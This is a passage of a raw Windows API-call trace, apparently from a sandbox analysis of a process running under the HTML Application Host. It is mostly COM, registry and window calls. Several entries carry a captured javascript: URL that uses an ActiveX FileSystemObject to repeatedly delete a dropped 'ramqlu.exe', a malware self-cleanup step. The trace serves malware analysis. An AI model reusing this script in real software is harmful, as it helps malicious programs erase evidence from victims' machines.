riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf25c | out: ppvObject=0x2cf25c*=0x43c254) returned 0x0 [0066.853] IUnknown:Release (This=0x43c254) returned 0x11 [0066.853] IUnknown:AddRef (This=0x43c254) returned 0x12 [0066.854] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f578 [0066.854] GetCurrentThreadId () returned 0x90 [0066.854] CreateBindCtx (in: reserved=0x0, ppbc=0x2cf2a0 | out: ppbc=0x2cf2a0*=0x4503c0) returned 0x0 [0066.854] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc) returned 0x4515b0 [0066.854] IUnknown:AddRef (This=0x4503c0) returned 0x2 [0066.854] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1c) returned 0x445b28 [0066.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf184 | out: phkResult=0x2cf184*=0x198) returned 0x0 [0066.855] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf188 | out: phkResult=0x2cf188*=0x12c) returned 0x0 [0066.855] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf144 | out: phkResult=0x2cf144*=0x0) returned 0x2 [0066.855] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf144 | out: phkResult=0x2cf144*=0x1a0) returned 0x0 [0066.855] SHRegGetValueW () returned 0x2 [0066.855] SHRegGetValueW () returned 0x2 [0066.855] RegCloseKey (hKey=0x1a0) returned 0x0 [0066.855] RegCloseKey (hKey=0x0) returned 0x6 [0066.855] RegCloseKey (hKey=0x0) returned 0x6 [0066.855] RegCloseKey (hKey=0x198) returned 0x0 [0066.855] RegCloseKey (hKey=0x12c) returned 0x0 [0066.855] RegisterBindStatusCallback (in: pBC=0x4503c0, pBSCb=0x453428, ppBSCBPrev=0x0, 
dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0066.855] IUnknown:AddRef (This=0x453428) returned 0x4 [0066.856] IUnknown:QueryInterface (in: This=0x453428, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2cf1ec | out: ppvObject=0x2cf1ec*=0x45342c) returned 0x0 [0066.856] IMoniker:RemoteBindToStorage (in: This=0x4206a8, pbc=0x4503c0, pmkToLeft=0x0, riid=0x74c1f8b0, ppvObj=0x2cf238 | out: ppvObj=0x2cf238*=0x0) returned 0x401e8 [0066.856] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ced70 | out: ppv=0x2ced70*=0x75028d20) returned 0x0 [0066.856] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cee5c | out: ppvObject=0x2cee5c*=0x75028d2c) returned 0x0 [0066.857] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.857] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x453eb0, cchResult=0x824, pcchResult=0x2cf170, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cf170*=0x0) returned 0x800c0011 [0066.857] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.857] IUnknown:QueryInterface (in: This=0x453428, riid=0x7682ad24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x2cf100 | out: ppvObject=0x2cf100*=0x453428) returned 0x0 [0066.857] 
IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0x453428, grfBINDF=0x4554cc, pbindinfo=0x45557c, pstgmed=0x4554d0, grfBINDF2=0x2cf14c, pdwReserved=0x80004005 | out: grfBINDF=0x4554cc*=0x83, pbindinfo=0x45557c, pstgmed=0x4554d0, grfBINDF2=0x2cf14c*=0x0, pdwReserved=0x80004005) returned 0x0 [0066.857] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf020 | out: phkResult=0x2cf020*=0x12c) returned 0x0 [0066.857] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf024 | out: phkResult=0x2cf024*=0x198) returned 0x0 [0066.857] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x2cefe0 | out: phkResult=0x2cefe0*=0x0) returned 0x2 [0066.858] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x2cefe0 | out: phkResult=0x2cefe0*=0x0) returned 0x2 [0066.858] RegCloseKey (hKey=0x0) returned 0x6 [0066.858] RegCloseKey (hKey=0x0) returned 0x6 [0066.858] RegCloseKey (hKey=0x12c) returned 0x0 [0066.858] RegCloseKey (hKey=0x198) returned 0x0 [0066.858] IUnknown:Release (This=0x453428) returned 0x5 [0066.858] IUnknown:QueryInterface (in: This=0x453428, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf0c8 | out: ppvObject=0x2cf0c8*=0x0) returned 0x80004002 [0066.858] IServiceProvider:QueryService (in: This=0x45342c, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, 
[7]=0xb)), ppvObject=0x2cf0c8 | out: ppvObject=0x2cf0c8*=0x0) returned 0x80004002 [0066.858] GetCurrentThreadId () returned 0x90 [0066.859] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf014 | out: ppv=0x2cf014*=0x75028d20) returned 0x0 [0066.859] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.861] IBindStatusCallback:OnStartBinding (This=0x453428, dwReserved=0xff, pib=0x455488) returned 0x0 [0066.861] IUnknown:AddRef (This=0x455488) returned 0x2 [0066.861] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.861] IUnknown:QueryInterface (in: This=0x453428, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cefd8 | out: ppvObject=0x2cefd8*=0x0) returned 0x80004002 [0066.861] IServiceProvider:QueryService (in: This=0x45342c, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cefd8 | out: ppvObject=0x2cefd8*=0x0) returned 0x80004002 [0066.861] GetCurrentThreadId () returned 0x90 [0066.861] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cefe8 | out: ppv=0x2cefe8*=0x75028d20) returned 0x0 [0066.862] IClassFactory:CreateInstance 
(in: This=0x75028d20, pUnkOuter=0x4555f0, riid=0x7681482c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x455614 | out: ppvObject=0x455614*=0x454348) returned 0x0 [0066.883] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x98) returned 0x454348 [0066.883] IUnknown_QueryService (in: punk=0x4555f0, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvOut=0x2cf018 | out: ppvOut=0x2cf018*=0x444aa4) returned 0x0 [0066.884] IUnknown:QueryInterface (in: This=0x453428, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x2ceec0 | out: ppvObject=0x2ceec0*=0x0) returned 0x80004002 [0066.884] IServiceProvider:QueryService (in: This=0x45342c, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x2ceec0 | out: ppvObject=0x2ceec0*=0x444aa4) returned 0x0 [0066.884] GetCurrentThreadId () returned 0x90 [0066.935] IUnknown:QueryInterface (in: This=0x454348, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x455678 | out: ppvObject=0x455678*=0x45435c) returned 0x0 [0066.935] IUnknown:AddRef (This=0x4555f0) returned 0x7 [0066.935] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.936] IUnknown:Release (This=0x45435c) returned 0x6 [0066.936] IUnknown:Release 
(This=0x4555f0) returned 0x6 [0066.936] IUnknown:AddRef (This=0x45435c) returned 0x7 [0066.936] IUnknown:AddRef (This=0x4555f0) returned 0x7 [0066.936] IUnknown:Release (This=0x45435c) returned 0x6 [0066.936] IUnknown:Release (This=0x4555f0) returned 0x6 [0066.936] IUnknown:QueryInterface (in: This=0x45435c, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf0c4 | out: ppvObject=0x2cf0c4*=0x455600) returned 0x0 [0066.936] IUnknown:QueryInterface (in: This=0x4555f0, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf0c4 | out: ppvObject=0x2cf0c4*=0x455600) returned 0x0 [0066.936] IUnknown:QueryInterface (in: This=0x454348, riid=0x76826b00*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x2cf0d0 | out: ppvObject=0x2cf0d0*=0x0) returned 0x80004002 [0067.702] IUnknown:AddRef (This=0x4555f0) returned 0x8 [0067.702] CoInternetParseUrl (in: pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=0x13, dwFlags=0x0, pszResult=0x2cd090, cchResult=0x1000, pcchResult=0x2cd078, dwReserved=0x0 | out: pszResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cd078) returned 0x0 [0067.703] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ccf0c | out: ppv=0x2ccf0c*=0x75028d20) returned 0x0 
[0067.703] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ccff8 | out: ppvObject=0x2ccff8*=0x75028d2c) returned 0x0 [0067.703] IUnknown:Release (This=0x75028d20) returned 0x1 [0067.703] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=19, dwParseFlags=0x0, pwzResult=0x2cd090, cchResult=0x1000, pcchResult=0x2cd078, dwReserved=0x0 | out: pwzResult="텼,", pcchResult=0x2cd078*=0x2cd17c) returned 0x800c0011 [0067.703] IUnknown:Release (This=0x75028d2c) returned 0x1 [0067.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x454bf0 [0067.704] IUnknown:Release (This=0x4503c0) returned 0x2 [0067.704] IUnknown:Release (This=0x43c254) returned 0x17 [0067.704] IUnknown:Release (This=0x43c254) returned 0x16 [0067.704] IUnknown:Release (This=0x43c254) returned 0x15 [0067.704] CoTaskMemFree (pv=0x0) [0067.704] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1a8) returned 0x454d18 [0067.704] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cf510 | out: lpCPInfo=0x2cf510) returned 1 [0067.704] IUnknown:AddRef (This=0x43f548) returned 0x3 [0067.704] IUnknown:AddRef (This=0x43c254) returned 0x16 [0067.704] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf518 | out: ppvObject=0x2cf518*=0x43c254) returned 0x0 [0067.705] IUnknown:Release (This=0x43c254) returned 0x16 [0067.705] IUnknown:AddRef (This=0x43c254) returned 0x17 [0067.705] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf51c | out: pdwScheme=0x2cf51c*=0xf) returned 0x0 [0067.705] IUnknown:Release (This=0x43f548) returned 
0x2 [0067.705] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x459a10 [0067.705] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x150 [0067.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74c1e718, lpParameter=0x459a10, dwCreationFlags=0x0, lpThreadId=0x459a24 | out: lpThreadId=0x459a24*=0x94c) returned 0x12c [0067.706] GetCurrentThreadId () returned 0x90 [0067.707] IUnknown:Release (This=0x43c254) returned 0x16 [0067.707] IUnknown:Release (This=0x43bfcc) returned 0x3 [0067.707] IUnknown:Release (This=0x4206a8) returned 0x3 [0067.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.707] IUnknown:Release (This=0x43c254) returned 0x15 [0067.707] IUnknown:Release (This=0x43c254) returned 0x14 [0067.707] IUnknown:Release (This=0x43c254) returned 0x13 [0067.707] IUnknown:Release (This=0x4206a8) returned 0x2 [0067.707] IUnknown:Release (This=0x43c254) returned 0x12 [0067.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.708] CoTaskMemFree (pv=0x451ae0) [0067.708] CoTaskMemFree (pv=0x0) [0067.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.708] IUnknown:Release (This=0x43c254) returned 0x11 [0067.708] CoTaskMemFree (pv=0x4519c0) [0067.708] GetClientRect (in: hWnd=0x3017c, lpRect=0x2cfa34 | out: lpRect=0x2cfa34) returned 1 [0067.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x78) returned 0x421a38 [0067.709] GetClientRect (in: hWnd=0x3017c, lpRect=0x421a64 | out: lpRect=0x421a64) returned 1 [0067.709] OffsetRect (in: lprc=0x421a64, 
dx=0, dy=0 | out: lprc=0x421a64) returned 1 [0067.709] OffsetRect (in: lprc=0x421a74, dx=0, dy=0 | out: lprc=0x421a74) returned 1 [0067.709] RegisterClassExW (param_1=0x2cf550) returned 0xc168 [0067.709] CoCreateInstance (in: rclsid=0x74c3bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x74c3bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7502b020 | out: ppv=0x7502b020*=0x445c90) returned 0x0 [0067.714] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x445c90, aaClassList=0x2cf648*=0xc168, uSize=0x1) returned 0x0 [0067.714] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc168, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x3017c, hMenu=0x0, hInstance=0x74af0000, lpParam=0x442fc8) returned 0x202a8 [0067.715] GetWindowLongW (hWnd=0x202a8, nIndex=-20) returned 0 [0067.715] SetWindowLongW (hWnd=0x202a8, nIndex=-21, dwNewLong=4468680) returned 0 [0067.715] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x81, wParam=0x0, lParam=0x2cf21c*=4468680, plResult=0x2cf094 | out: plResult=0x2cf094) returned 0x1 [0067.715] NtdllDefWindowProc_W () returned 0x1 [0067.715] GetCurrentThreadId () returned 0x90 [0067.715] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.715] GetCurrentThreadId () returned 0x90 [0067.715] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.715] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x1, wParam=0x0, lParam=0x2cf21c*=4468680, plResult=0x2cf094 | out: plResult=0x2cf094) returned 0x1 [0067.716] NtdllDefWindowProc_W () returned 0x0 [0067.716] GetCurrentThreadId () returned 0x90 [0067.716] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 
[0067.716] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x2cf0e0 | out: plResult=0x2cf0e0) returned 0x1 [0067.716] NtdllDefWindowProc_W () returned 0x0 [0067.716] GetCurrentThreadId () returned 0x90 [0067.716] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.716] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x2cf0e0 | out: plResult=0x2cf0e0) returned 0x1 [0067.716] NtdllDefWindowProc_W () returned 0x0 [0067.716] GetCurrentThreadId () returned 0x90 [0067.716] NtdllDefWindowProc_W () returned 0x0 [0067.716] GetClassNameW (in: hWnd=0x3017c, lpClassName=0x2cf650, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0067.716] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0067.717] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x445c90, fRestoreLayout=1) returned 0x0 [0067.717] SendMessageW (hWnd=0x202a8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0067.717] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.717] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x2cf504 | out: plResult=0x2cf504) returned 0x1 [0067.717] NtdllDefWindowProc_W () returned 0x3 [0067.717] GetCurrentThreadId () returned 0x90 [0067.717] IntersectRect (in: lprcDst=0x2cf884, lprcSrc1=0x421a64, lprcSrc2=0x421a74 | out: lprcDst=0x2cf884) returned 1 [0067.717] EqualRect (lprc1=0x2cf884, lprc2=0x421a64) returned 1 [0067.717] InvalidateRect (hWnd=0x202a8, lpRect=0x0, bErase=1) returned 1 [0067.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xf0) returned 0x451ac0 [0067.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x150) returned 0x459a70 [0067.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, 
Size=0x140) returned 0x459bc8 [0067.717] IntersectRect (in: lprcDst=0x2cf770, lprcSrc1=0x2cf770, lprcSrc2=0x2cf708 | out: lprcDst=0x2cf770) returned 1 [0067.717] IntersectRect (in: lprcDst=0x2cf770, lprcSrc1=0x2cf770, lprcSrc2=0x2cf708 | out: lprcDst=0x2cf770) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x459d10 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x42da70 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x459d78 [0067.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42daa8 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4516d0 [0067.718] GetCurrentThreadId () returned 0x90 [0067.718] GetCurrentThreadId () returned 0x90 [0067.718] GetCurrentThreadId () returned 0x90 [0067.718] IntersectRect (in: lprcDst=0x2cf5ac, lprcSrc1=0x2cf5ac, lprcSrc2=0x2cf57c | out: lprcDst=0x2cf5ac) returned 1 [0067.718] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf59c | out: lprcDst=0x459c28) returned 1 [0067.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453648 [0067.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453648 | out: hHeap=0x410000) returned 1 [0067.719] SetWindowPos (hWnd=0x202a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0067.719] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.719] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x46, wParam=0x0, lParam=0x2cf864*=131752, plResult=0x2cf700 | out: plResult=0x2cf700) returned 0x1 [0067.719] NtdllDefWindowProc_W () 
returned 0x0 [0067.719] GetCurrentThreadId () returned 0x90 [0067.719] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0067.719] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x47, wParam=0x0, lParam=0x2cf864*=131752, plResult=0x2cf6fc | out: plResult=0x2cf6fc) returned 0x1 [0067.719] NtdllDefWindowProc_W () returned 0x0 [0067.720] GetCurrentThreadId () returned 0x90 [0067.720] SetTimer (hWnd=0x202a8, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0067.720] GetFocus () returned 0x0 [0067.720] EnumChildWindows (hWndParent=0x202a8, lpEnumFunc=0x74e10a73, lParam=0x2cf75c) returned 0 [0067.720] GetFocus () returned 0x0 [0067.720] SetFocus (hWnd=0x202a8) returned 0x0 [0067.721] NtdllDefWindowProc_W () returned 0x0 [0067.721] NtdllDefWindowProc_W () returned 0x0 [0067.722] NtdllDefWindowProc_W () returned 0x0 [0067.722] NtdllDefWindowProc_W () returned 0x0 [0067.722] NtdllDefWindowProc_W () returned 0x0 [0067.723] NtdllDefWindowProc_W () returned 0x0 [0067.723] NtdllDefWindowProc_W () returned 0x0 [0067.723] NtdllDefWindowProc_W () returned 0x0 [0067.723] NtdllDefWindowProc_W () returned 0x0 [0067.724] NtdllDefWindowProc_W () returned 0x0 [0067.724] NtdllDefWindowProc_W () returned 0x1 [0067.724] NtdllDefWindowProc_W () returned 0x0 [0067.725] NtdllDefWindowProc_W () returned 0x0 [0068.466] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0068.466] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x75300000 [0068.469] GetProcAddress (hModule=0x75300000, lpProcName="LresultFromObject") returned 0x75302663 [0068.469] LresultFromObject () returned 0xc171 [0069.349] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x453090 [0069.350] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453738 [0069.835] GetCurrentThreadId () returned 0x90 [0069.837] HeapFree (in: hHeap=0x410000, 